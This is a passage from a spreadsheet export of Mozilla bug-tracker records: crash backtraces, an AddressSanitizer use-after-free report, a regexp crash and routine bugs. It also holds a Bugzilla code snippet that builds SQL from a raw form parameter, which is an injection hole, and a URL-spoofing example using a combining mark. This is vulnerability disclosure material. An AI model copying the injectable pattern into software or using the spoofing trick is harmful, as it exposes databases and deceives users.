#17 0x00005555578cf5c3 in vixl::Simulator::Run (this=0x7ffff6a35100) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/Simulator-vixl.cpp:70
#18 0x00005555578ccde0 in vixl::Simulator::RunFrom (this=0x7ffff6a35100, first=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/Simulator-vixl.cpp:78
#19 vixl::Simulator::call (this=0x7ffff6a35100, entry=&lt;optimized out&gt;, argument_count=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/MozSimulator-vixl.cpp:327
#20 0x0000555557b0e009 in EnterJit (cx=0x7ffff6a2d000, state=..., code=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/jit/Jit.cpp:107
#21 js::jit::MaybeEnterJit (cx=cx@entry=0x7ffff6a2d000, state=...) at /home/skygentoo/trees/mozilla-central/js/src/jit/Jit.cpp:205
#22 0x0000555556c2dc81 in js::RunScript (cx=cx@entry=0x7ffff6a2d000, state=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:380
#23 0x0000555556c40b14 in js::InternalCallOrConstruct (cx=0x7ffff6a2d000, cx@entry=0x7ffff6af8d48, args=..., construct=construct@entry=js::NO_CONSTRUCT, reason=&lt;optimized out&gt;, reason@entry=js::CallReason::Getter) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:540
#24 0x0000555556c4181e in InternalCall (cx=&lt;optimized out&gt;, args=..., reason=reason@entry=js::CallReason::Call) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:575
#25 0x0000555556c41789 in js::CallFromStack (cx=0x7ffff7c87a60 &lt;_IO_stdfile_2_lock&gt;, args=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:579
#26 0x0000555557668199 in js::jit::DoCallFallback (cx=0x7ffff7c87a60 &lt;_IO_stdfile_2_lock&gt;, frame=&lt;optimized out&gt;, stub=0x7ffff6af8d48, argc=&lt;optimized out&gt;, vp=0x7ffff687fbe8, res=...) at /home/skygentoo/trees/mozilla-central/js/src/jit/BaselineIC.cpp:1580
#27 0x00005555578ce4d4 in vixl::Simulator::VisitCallRedirection (this=this@entry=0x7ffff6a35100, instr=&lt;optimized out&gt;, instr@entry=0x7ffff6a42c68) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/MozSimulator-vixl.cpp:739
#28 0x00005555578cd090 in vixl::Simulator::VisitException (this=0x7ffff6a35100, instr=0x7ffff6a42c68) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/MozSimulator-vixl.cpp:447
#29 0x000055555787ae2d in vixl::Decoder::VisitException (this=&lt;optimized out&gt;, instr=0x7ffff6a42c68) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/Decoder-vixl.cpp:876
#30 0x00005555578cc192 in vixl::CachingDecoder::Decode (this=0x7ffff6a03df0, instr=0x7ffff6a42c68) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/MozSimulator-vixl.cpp:1127
#31 0x00005555578cbbfc in vixl::Simulator::ExecuteInstruction (this=this@entry=0x7ffff6a35100) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/MozSimulator-vixl.cpp:239
#32 0x00005555578cf5c3 in vixl::Simulator::Run (this=0x7ffff6a35100) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/Simulator-vixl.cpp:70
#33 0x00005555578ccde0 in vixl::Simulator::RunFrom (this=0x7ffff6a35100, first=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/Simulator-vixl.cpp:78
#34 vixl::Simulator::call (this=0x7ffff6a35100, entry=&lt;optimized out&gt;, argument_count=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/MozSimulator-vixl.cpp:327
#35 0x0000555557b0e009 in EnterJit (cx=0x7ffff6a2d000, state=..., code=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/jit/Jit.cpp:107
#36 js::jit::MaybeEnterJit (cx=cx@entry=0x7ffff6a2d000, state=...) at /home/skygentoo/trees/mozilla-central/js/src/jit/Jit.cpp:205
#37 0x0000555556c2dc81 in js::RunScript (cx=cx@entry=0x7ffff6a2d000, state=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:380
#38 0x0000555556c40b14 in js::InternalCallOrConstruct (cx=0x7ffff6a2d000, cx@entry=0x0, args=..., construct=construct@entry=js::NO_CONSTRUCT, reason=&lt;optimized out&gt;, reason@entry=(unknown: 0xffffb058)) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:540
#39 0x0000555556c4181e in InternalCall (cx=cx@entry=0x7ffff6a2d000, args=..., reason=reason@entry=js::CallReason::Call) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:575
#40 0x0000555556c41a13 in js::Call (cx=cx@entry=0x7ffff6a2d000, fval=..., fval@entry=..., thisv=..., thisv@entry=..., args=..., rval=rval@entry=..., reason=reason@entry=js::CallReason::Call) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:606
#41 0x0000555556d071dd in js::Call (cx=0x7ffff6a2d000, fval=..., thisv=..., arg0=..., rval=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.h:105
#42 0x0000555556f0a491 in PromiseReactionJob (cx=0x7ffff7c87a60 &lt;_IO_stdfile_2_lock&gt;, cx@entry=0x7ffff6a2d000, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/builtin/Promise.cpp:2241
#43 0x0000555556c4edc0 in CallJSNative (cx=cx@entry=0x7ffff6a2d000, native=native@entry=0x555556f09330 &lt;PromiseReactionJob(JSContext*, unsigned int, JS::Value*)&gt;, reason=&lt;optimized out&gt;, reason@entry=js::CallReason::Call, args=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:421
#44 0x0000555556c40bd8 in js::InternalCallOrConstruct (cx=0x7ffff6a2d000, cx@entry=0x0, args=..., construct=construct@entry=js::NO_CONSTRUCT, reason=(js::CallReason::Getter | js::CallReason::Setter | unknown: 0xf7c86720), reason@entry=(unknown: 0xffffb438)) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:508
#45 0x0000555556c4181e in InternalCall (cx=cx@entry=0x7ffff6a2d000, args=..., reason=reason@entry=js::CallReason::Call) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:575
#46 0x0000555556c41a13 in js::Call (cx=cx@entry=0x7ffff6a2d000, fval=..., thisv=..., args=..., rval=rval@entry=..., reason=reason@entry=js::CallReason::Call) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:606
#47 0x0000555556d9bdb2 in JS::Call (cx=0x7ffff7c87a60 &lt;_IO_stdfile_2_lock&gt;, cx@entry=0x7ffff6a2d000, thisv=..., fval=..., args=..., rval=..., rval@entry=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/CallAndConstruct.cpp:117
#48 0x0000555556e62c0e in JS::Call (cx=0x7ffff6a2d000, thisv=..., funObj=..., args=..., rval=...) at /home/skygentoo/shell-cache/js-dbg-64-armsim64-linux-x86_64-65e579f52525/objdir-js/dist/include/js/CallAndConstruct.h:110
#49 js::InternalJobQueue::runJobs (this=0x7ffff6a40d00, cx=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/vm/JSContext.cpp:849
#50 0x0000555556e62666 in js::RunJobs (cx=cx@entry=0x7ffff6a2d000) at /home/skygentoo/trees/mozilla-central/js/src/vm/JSContext.cpp:786
#51 0x0000555556b44ff8 in RunShellJobs (cx=cx@entry=0x7ffff6a2d000) at /home/skygentoo/trees/mozilla-central/js/src/shell/js.cpp:1166
#52 0x0000555556b5ebc2 in DrainJobQueue (cx=0x7ffff6a2d000, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/shell/js.cpp:1188
#53 0x00005555578ce2f5 in vixl::Simulator::VisitCallRedirection (this=this@entry=0x7ffff6a35100, instr=&lt;optimized out&gt;, instr@entry=0x7ffff553b588) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/MozSimulator-vixl.cpp:724
#54 0x00005555578cd090 in vixl::Simulator::VisitException (this=0x7ffff6a35100, instr=0x7ffff553b588) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/MozSimulator-vixl.cpp:447
#55 0x000055555787ae2d in vixl::Decoder::VisitException (this=&lt;optimized out&gt;, instr=0x7ffff553b588) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/Decoder-vixl.cpp:876
#56 0x00005555578cc192 in vixl::CachingDecoder::Decode (this=0x7ffff6a03df0, instr=0x7ffff553b588) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/MozSimulator-vixl.cpp:1127
#57 0x00005555578cbbfc in vixl::Simulator::ExecuteInstruction (this=this@entry=0x7ffff6a35100) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/MozSimulator-vixl.cpp:239
#58 0x00005555578cf5c3 in vixl::Simulator::Run (this=0x7ffff6a35100) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/Simulator-vixl.cpp:70
#59 0x00005555578ccde0 in vixl::Simulator::RunFrom (this=0x7ffff6a35100, first=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/Simulator-vixl.cpp:78
#60 vixl::Simulator::call (this=0x7ffff6a35100, entry=&lt;optimized out&gt;, argument_count=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/MozSimulator-vixl.cpp:327
#61 0x0000555557b0e009 in EnterJit (cx=0x7ffff6a2d000, state=..., code=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/jit/Jit.cpp:107
#62 js::jit::MaybeEnterJit (cx=cx@entry=0x7ffff6a2d000, state=...) at /home/skygentoo/trees/mozilla-central/js/src/jit/Jit.cpp:205
#63 0x0000555556c2dc81 in js::RunScript (cx=cx@entry=0x7ffff6a2d000, state=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:380
#64 0x0000555556c43324 in js::ExecuteKernel (cx=cx@entry=0x7ffff6a2d000, script=script@entry=..., envChainArg=envChainArg@entry=..., evalInFrame=evalInFrame@entry=..., result=result@entry=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:782
#65 0x0000555556c4370c in js::Execute (cx=cx@entry=0x7ffff6a2d000, script=..., envChain=..., rval=..., rval@entry=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:814
#66 0x0000555556dbfe6f in ExecuteScript (cx=cx@entry=0x7ffff6a2d000, envChain=..., script=..., rval=rval@entry=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/CompilationAndEvaluation.cpp:509
#67 0x0000555556dc0098 in JS_ExecuteScript (cx=cx@entry=0x7ffff6a2d000, scriptArg=scriptArg@entry=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/CompilationAndEvaluation.cpp:533
#68 0x0000555556b7348a in RunFile (cx=cx@entry=0x7ffff6a2d000, filename=0x7fffffffde57 "114.js", filename@entry=0x7ffff7864020 "\230$\255\373\344\344\344", &lt;incomplete sequence \344&gt;, file=file@entry=0x7ffff7864020, compileMethod=&lt;optimized out&gt;, compileMethod@entry=CompileUtf8::DontInflate, compileOnly=false) at /home/skygentoo/trees/mozilla-central/js/src/shell/js.cpp:1069
#69 0x0000555556b72b4f in Process (cx=cx@entry=0x7ffff6a2d000, filename=&lt;optimized out&gt;, forceTTY=false, kind=kind@entry=FileScript) at /home/skygentoo/trees/mozilla-central/js/src/shell/js.cpp:1659
#70 0x0000555556b38e97 in ProcessArgs (cx=0x7ffff6a2d000, op=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/shell/js.cpp:10964
#71 Shell (cx=0x7ffff6a2d000, op=op@entry=0x7fffffffd6d8) at /home/skygentoo/trees/mozilla-central/js/src/shell/js.cpp:11703
#72 0x0000555556b31d6a in main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/shell/js.cpp:12825
(gdb)
```
Run with `--fuzzing-safe --ion-offthread-compile=off --ion-eager`, compile with `AR=ar sh ./configure --enable-simulator=arm64 --enable-debug --with-ccache --enable-gczeal --enable-debug-symbols --disable-bootstrap --disable-tests`, tested on m-c rev 65e579f52525.
Bisection result coming up...
Note that this may be slightly intermittent. Not sure if this is s-s.</t>
        </is>
      </c>
      <c r="X3649" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3650">
      <c r="A3650" t="n">
        <v>978862</v>
      </c>
      <c r="B3650" t="inlineStr">
        <is>
          <t>2014-03-03 10:34:24 -0800</t>
        </is>
      </c>
      <c r="C3650" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsEventListenerManager::CompileEventHandlerInternal</t>
        </is>
      </c>
      <c r="D3650" t="inlineStr">
        <is>
          <t>2024-05-30 08:32:54 -0700</t>
        </is>
      </c>
      <c r="E3650" t="n">
        <v>1</v>
      </c>
      <c r="F3650" t="n">
        <v>1</v>
      </c>
      <c r="G3650" t="n">
        <v>3</v>
      </c>
      <c r="H3650" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3650" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3650" t="inlineStr">
        <is>
          <t>DOM: Events</t>
        </is>
      </c>
      <c r="K3650" t="inlineStr">
        <is>
          <t>30 Branch</t>
        </is>
      </c>
      <c r="L3650" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3650" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3650" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3650" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3650" t="inlineStr">
        <is>
          <t>[adv-main30+]</t>
        </is>
      </c>
      <c r="Q3650" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3650" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3650" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T3650" t="n">
        <v>1</v>
      </c>
      <c r="U3650" t="n">
        <v>0</v>
      </c>
      <c r="V3650" t="n">
        <v>13</v>
      </c>
      <c r="W3650" t="inlineStr">
        <is>
          <t>Created attachment 8384727
BC7FAF8C-242032.html
Found by the BlackBerry Security Automated Analysis Team's fuzzing framework ALF.
==5540==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000d75f8 at pc 0x7fcb6095eb42 bp 0x7fffa2779990 sp 0x7fffa2779988
READ of size 8 at 0x60c0000d75f8 thread T0
    #0 0x7fcb6095eb41 (libxul.so!nsEventListenerManager::CompileEventHandlerInternal(nsListenerStruct*, nsAString_internal const*, mozilla::dom::Element*)+0x2b91)
	Line 793 of "../../dist/include/nsCOMPtr.h"
    #1 0x7fcb6095f59d (libxul.so!nsEventListenerManager::HandleEventSubType(nsListenerStruct*, nsIDOMEvent*, mozilla::dom::EventTarget*)+0x14d)
	Line 946 of "/builds/slave/m-in-l64-asan-0000000000000000/build/dom/events/nsEventListenerManager.cpp"
    #2 0x7fcb6096074f (libxul.so!nsEventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*)+0x92f)
	Line 1021 of "/builds/slave/m-in-l64-asan-0000000000000000/build/dom/events/nsEventListenerManager.cpp"
    #3 0x7fcb60a10ac0 (libxul.so!nsEventTargetChainItem::HandleEventTargetChain(nsTArray&lt;nsEventTargetChainItem&gt;&amp;, nsEventChainPostVisitor&amp;, nsDispatchingCallback*, ELMCreationDetector&amp;)+0x810)
	Line 303 of "/builds/slave/m-in-l64-asan-0000000000000000/build/dom/events/nsEventDispatcher.cpp"
    #4 0x7fcb609e758a (libxul.so!nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*, nsCOMArray&lt;mozilla::dom::EventTarget&gt;*)+0x292a)
	Line 592 of "/builds/slave/m-in-l64-asan-0000000000000000/build/dom/events/nsEventDispatcher.cpp"
...</t>
        </is>
      </c>
      <c r="X3650" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3651">
      <c r="A3651" t="n">
        <v>244272</v>
      </c>
      <c r="B3651" t="inlineStr">
        <is>
          <t>2004-05-21 06:45:27 -0700</t>
        </is>
      </c>
      <c r="C3651" t="inlineStr">
        <is>
          <t>editusers 'query' parameter should be removed</t>
        </is>
      </c>
      <c r="D3651" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:39 -0800</t>
        </is>
      </c>
      <c r="E3651" t="n">
        <v>1</v>
      </c>
      <c r="F3651" t="n">
        <v>1</v>
      </c>
      <c r="G3651" t="n">
        <v>4</v>
      </c>
      <c r="H3651" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3651" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3651" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K3651" t="inlineStr">
        <is>
          <t>2.17.7</t>
        </is>
      </c>
      <c r="L3651" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3651" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3651" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3651" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3651" t="inlineStr">
        <is>
          <t>[fixed in 2.16.6] [fixed in 2.18rc1]</t>
        </is>
      </c>
      <c r="Q3651" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3651" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3651" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T3651" t="n">
        <v>1</v>
      </c>
      <c r="U3651" t="n">
        <v>0</v>
      </c>
      <c r="V3651" t="n">
        <v>10</v>
      </c>
      <c r="W3651" t="inlineStr">
        <is>
          <t>editusers.cgi, line 322:
  } elsif (exists $::FORM{'query'}) {
    $query = "SELECT login_name,realname,disabledtext " .
        "FROM profiles WHERE " . $::FORM{'query'} . " ORDER BY login_name";
i think this should be removed because:
 (1) i can't find anywhere where it's used
 (2) it's not taint-safe, and can't be untainted without breaking the function
 (3) it's just a bad idea :)</t>
        </is>
      </c>
      <c r="X3651" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3652">
      <c r="A3652" t="n">
        <v>1370497</v>
      </c>
      <c r="B3652" t="inlineStr">
        <is>
          <t>2017-06-06 03:56:57 -0700</t>
        </is>
      </c>
      <c r="C3652" t="inlineStr">
        <is>
          <t>URL spoofing using combining marks</t>
        </is>
      </c>
      <c r="D3652" t="inlineStr">
        <is>
          <t>2024-05-30 09:34:06 -0700</t>
        </is>
      </c>
      <c r="E3652" t="n">
        <v>1</v>
      </c>
      <c r="F3652" t="n">
        <v>1</v>
      </c>
      <c r="G3652" t="n">
        <v>2</v>
      </c>
      <c r="H3652" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3652" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3652" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K3652" t="inlineStr">
        <is>
          <t>53 Branch</t>
        </is>
      </c>
      <c r="L3652" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3652" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3652" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3652" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3652" t="inlineStr">
        <is>
          <t>[adv-main57+]</t>
        </is>
      </c>
      <c r="Q3652" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3652" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3652" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T3652" t="n">
        <v>1</v>
      </c>
      <c r="U3652" t="n">
        <v>0</v>
      </c>
      <c r="V3652" t="n">
        <v>34</v>
      </c>
      <c r="W3652" t="inlineStr">
        <is>
          <t>Created attachment 8874786
PoC.png
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Build ID: 20170518000419
Firefox for Android
Steps to reproduce:
http://xn--google-yri.com/ 
Actual results:
By adding this *ِ* (notice the weird thing under asterisk) we can actually spoof the URL (espicially the inexperienced users)
More info:
U+0650, ARABIC KASRA
Expected results:
The URL should be shown in PunnyCode or these letters should be banned.</t>
        </is>
      </c>
      <c r="X3652" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3653">
      <c r="A3653" t="n">
        <v>691299</v>
      </c>
      <c r="B3653" t="inlineStr">
        <is>
          <t>2011-10-03 05:30:12 -0700</t>
        </is>
      </c>
      <c r="C3653" t="inlineStr">
        <is>
          <t>Crash at js::RegExp::executeInternal</t>
        </is>
      </c>
      <c r="D3653" t="inlineStr">
        <is>
          <t>2024-05-29 15:56:41 -0700</t>
        </is>
      </c>
      <c r="E3653" t="n">
        <v>1</v>
      </c>
      <c r="F3653" t="n">
        <v>1</v>
      </c>
      <c r="G3653" t="n">
        <v>3</v>
      </c>
      <c r="H3653" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3653" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3653" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3653" t="inlineStr">
        <is>
          <t>7 Branch</t>
        </is>
      </c>
      <c r="L3653" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3653" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3653" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3653" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3653" t="inlineStr">
        <is>
          <t>[sg:critical?][qa!]</t>
        </is>
      </c>
      <c r="Q3653" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3653" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3653" t="inlineStr">
        <is>
          <t>mozilla11</t>
        </is>
      </c>
      <c r="T3653" t="n">
        <v>1</v>
      </c>
      <c r="U3653" t="n">
        <v>0</v>
      </c>
      <c r="V3653" t="n">
        <v>25</v>
      </c>
      <c r="W3653" t="inlineStr">
        <is>
          <t>Created attachment 564162
regex.html
User Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0
Build ID: 20110928060149
Steps to reproduce:
I stumbled into another regexp issue similar to https://bugzilla.mozilla.org/show_bug.cgi?id=653672. That one was fixed in Firefox 7.0, but this one remains in it and 8.0 beta. Filing as a security bug based on the high crash address and probability of there being a similar integer error.
Actual results:
Firefox 7.0 / Linux (64-bit Debian 6.0.2) -&gt; https://crash-stats.mozilla.com/report/index/2b6d78d1-df97-4497-bbcc-b3fae2111003
Firefox 8.0 beta / ditto-&gt; https://crash-stats.mozilla.com/report/index/bp-82827ac7-07c6-4f97-a697-5f1202111003
Expected results:
Firefox shouldn't have crashed and I should have caught this earlier.</t>
        </is>
      </c>
      <c r="X3653" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3654">
      <c r="A3654" t="n">
        <v>1208322</v>
      </c>
      <c r="B3654" t="inlineStr">
        <is>
          <t>2015-09-24 19:49:48 -0700</t>
        </is>
      </c>
      <c r="C3654" t="inlineStr">
        <is>
          <t>[user story] Reviewers should be able to leave internal comments on review actions taken.</t>
        </is>
      </c>
      <c r="D3654" t="inlineStr">
        <is>
          <t>2015-10-22 10:39:19 -0700</t>
        </is>
      </c>
      <c r="E3654" t="n">
        <v>1</v>
      </c>
      <c r="F3654" t="n">
        <v>1</v>
      </c>
      <c r="G3654" t="n">
        <v>5</v>
      </c>
      <c r="H3654" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3654" t="inlineStr">
        <is>
          <t>Tracking</t>
        </is>
      </c>
      <c r="J3654" t="inlineStr">
        <is>
          <t>User Story</t>
        </is>
      </c>
      <c r="K3654" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3654" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3654" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3654" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3654" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3654" t="inlineStr"/>
      <c r="Q3654" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3654" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3654" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3654" t="n">
        <v>1</v>
      </c>
      <c r="U3654" t="n">
        <v>0</v>
      </c>
      <c r="V3654" t="n">
        <v>3</v>
      </c>
      <c r="W3654" t="inlineStr">
        <is>
          <t>These comments are shown in the review history and are visible to other reviewers.</t>
        </is>
      </c>
      <c r="X3654" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3655">
      <c r="A3655" t="n">
        <v>1377029</v>
      </c>
      <c r="B3655" t="inlineStr">
        <is>
          <t>2017-06-28 20:14:59 -0700</t>
        </is>
      </c>
      <c r="C3655" t="inlineStr">
        <is>
          <t>Intermittent test_quit_restart.py TestServerQuitApplication.test_attempt_quit,test_device_reset.html | application crashed [@ mozilla::storage::Service::Observe(nsISupports *,char const *,char16_t const *)]</t>
        </is>
      </c>
      <c r="D3655" t="inlineStr">
        <is>
          <t>2018-01-14 17:02:09 -0800</t>
        </is>
      </c>
      <c r="E3655" t="n">
        <v>1</v>
      </c>
      <c r="F3655" t="n">
        <v>1</v>
      </c>
      <c r="G3655" t="n">
        <v>3</v>
      </c>
      <c r="H3655" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3655" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J3655" t="inlineStr">
        <is>
          <t>Storage</t>
        </is>
      </c>
      <c r="K3655" t="inlineStr">
        <is>
          <t>56 Branch</t>
        </is>
      </c>
      <c r="L3655" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3655" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3655" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3655" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3655" t="inlineStr">
        <is>
          <t>[stockwell fixed:product]</t>
        </is>
      </c>
      <c r="Q3655" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3655" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3655" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T3655" t="n">
        <v>1</v>
      </c>
      <c r="U3655" t="n">
        <v>0</v>
      </c>
      <c r="V3655" t="n">
        <v>23</v>
      </c>
      <c r="W3655" t="inlineStr">
        <is>
          <t>Filed by: hskupin [at] mozilla.com
https://treeherder.mozilla.org/logviewer.html#?job_id=110587764&amp;repo=mozilla-inbound
https://archive.mozilla.org/pub/firefox/tinderbox-builds/mozilla-inbound-win64-debug/1498692643/mozilla-inbound_win8_64-debug_test-marionette-bm111-tests1-windows-build53.txt.gz</t>
        </is>
      </c>
      <c r="X3655" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3656">
      <c r="A3656" t="n">
        <v>1149187</v>
      </c>
      <c r="B3656" t="inlineStr">
        <is>
          <t>2015-03-30 09:07:47 -0700</t>
        </is>
      </c>
      <c r="C3656" t="inlineStr">
        <is>
          <t>[stage][regression] Signature reports are slow to load - sometimes timeout</t>
        </is>
      </c>
      <c r="D3656" t="inlineStr">
        <is>
          <t>2015-06-25 15:41:04 -0700</t>
        </is>
      </c>
      <c r="E3656" t="n">
        <v>1</v>
      </c>
      <c r="F3656" t="n">
        <v>1</v>
      </c>
      <c r="G3656" t="n">
        <v>4</v>
      </c>
      <c r="H3656" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3656" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3656" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3656" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3656" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3656" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3656" t="inlineStr">
        <is>
